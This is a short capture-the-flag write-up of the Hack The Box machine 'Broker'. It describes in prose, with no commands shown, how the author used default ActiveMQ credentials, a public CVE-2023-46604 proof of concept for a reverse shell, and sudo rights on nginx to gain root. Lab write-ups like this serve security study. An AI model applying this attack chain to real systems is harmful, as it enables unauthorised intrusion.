Enumeration

Nmap

Initial NMAP scan revealed SSH, HTTP, MQTT and ActiveMQ ports are open.

00 - nmapBroker

WEB Enumeration

WEB page had default credentials “admin:admin”, so I got access to it.

01 - broker admin

Directory Brute Force

The directory brute force revealed admin and api pages open. The admin page revealed the version of ActiveMQ.

02 - dirbust

03 - admin page

Exploitation

CVE-2023-46604

Analyzing the version revealed a public exploit. This repo includes a public PoC to get a reverse shell.

So I updated to poc-linux.xml and started a netcat listener. Then got a reverse shell.

04 - rce go

05 - shell

Got The User

06 - user

Privilege Escalation

sudo -l

The “sudo -l” revealed the user can run nginx as sudo. There were no GTFOBins page but searching through the internet revealed this repo.

07 - sudo l

Using sudo privileges of nginx, I can create a ssh key to login as root.

08 - nginx

09 - root

Pwned

The machine was pwned.

10 - gg

<
Previous Post
Sau - Hack The Box
>
Next Post
Soccer - Hack The Box